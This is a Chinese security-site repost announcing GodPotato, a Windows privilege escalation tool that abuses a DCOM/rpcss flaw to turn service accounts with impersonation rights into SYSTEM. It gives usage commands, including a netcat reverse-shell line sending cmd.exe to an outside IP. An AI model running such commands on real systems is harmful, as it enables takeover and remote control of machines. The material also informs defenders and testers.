GodPotato - 从 Windows 服务帐户到 NT AUTHORITY\SYSTEM 的本地权限提升工具

admin
admin
admin
138734
文章
114
评论
2024年10月22日22:35:56评论58 views字数 1412阅读4分42秒阅读模式

GodPotato - 从 Windows 服务帐户到 NT AUTHORITY\SYSTEM 的本地权限提升工具

基于Potato提权6年的历史,从RottenPotato开始到JuicyPotatoNG结束,我通过研究DCOM发现了一个新技术,它可以在Windows 2012-Windows 2022中实现提权,现在只要你有” ImpersonatePrivilege”权限。那你就是“NT AUTHORITYSYSTEM”,通常WEB服务和数据库服务都有“ImpersonatePrivilege”权限。
Potato提权通常在我们获取WEB/数据库权限时使用。我们可以将具有低权限的服务用户提升到“NT AUTHORITYSYSTEM”权限。但是,历史悠久的Potato已经没有办法在最新的Windows系统上运行了。我在研究DCOM的时候,发现了一种可以进行提权的新方法。rpcss在处理oxid时存在一些缺陷,rpcss是系统必须开启的服务。,因此它几乎可以在任何 Windows 操作系统上运行,我将其命名为 GodPotato
受影响的版本
  • Windows Server  2012
  • Windows Server  2022
  • Windows8
  • Windows 11

例子:

    FFFFF                   FFF  FFFFFFF   FFFFFFF                  FFF  FFFFFFFF  FFF  FFFF                 FFF  FFF   FFF             FFF                  FFF  FFF   FFF                 FFF  FFF   FFF             FFF                  FFF  FFF   FFF                 FFF  FFF   FFF             FFF                  FFF FFFF        FFFFFFF   FFFFFFFF  FFF   FFF  FFFFFFF  FFFFFFFFF   FFFFFF  FFFFFFFFF    FFFFFF FFFF       FFFF FFFF  FFF FFFF  FFF  FFFF FFFF FFFF   FFF      FFF  FFF    FFF      FFF FFFF FFFF FFFFF FFF   FFF FFF   FFF  FFFFFFFF  FFF   FFF   FFF      F    FFF    FFF     FFF   FFF FFFF   FFF FFF   FFFFFFF   FFF  FFF      FFFF   FFF   FFF         FFFFF    FFF     FFF   FFFF FFFF   FFF FFF   FFFFFFF   FFF  FFF      FFFF   FFF   FFF      FFFFFFFF    FFF     FFF   FFFF  FFF   FFF FFF   FFF FFF   FFF  FFF       FFF   FFF   FFF     FFFF  FFF    FFF     FFF   FFFF  FFFF FFFF FFFF  FFF FFFF  FFF  FFF       FFF  FFFF   FFF     FFFF  FFF    FFF     FFFF  FFF   FFFFFFFF  FFFFFFF   FFFFFFFF  FFF        FFFFFFF     FFFFFF  FFFFFFFF    FFFFFFF  FFFFFFF    FFFFFFF   FFFFF     FFFFFFF  FFF         FFFFF       FFFFF   FFFFFFFF     FFFF     FFFFArguments:        -cmd Required:True CommandLine (default cmd /c whoami)Example:GodPotato -cmd "cmd /c whoami"

使用程序内置的Clsid进行提权,执行一个简单的命令

GodPotato -cmd "cmd /c whoami"

GodPotato - 从 Windows 服务帐户到 NT AUTHORITY\SYSTEM 的本地权限提升工具

自定义 Clsid 并执行命令

GodPotato -cmd "cmd /c whoami"

GodPotato - 从 Windows 服务帐户到 NT AUTHORITY\SYSTEM 的本地权限提升工具

执行反向 shell 命令

GodPotato -cmd "nc -t -e C:WindowsSystem32cmd.exe 192.168.1.102 2012"

项目地址:https://github.com/BeichenDream/GodPotato

原文始发于微信公众号(Ots安全):GodPotato - 从 Windows 服务帐户到 NT AUTHORITY\SYSTEM 的本地权限提升工具

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月22日22:35:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   GodPotato - 从 Windows 服务帐户到 NT AUTHORITY\SYSTEM 的本地权限提升工具https://cn-sec.com/archives/1848849.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息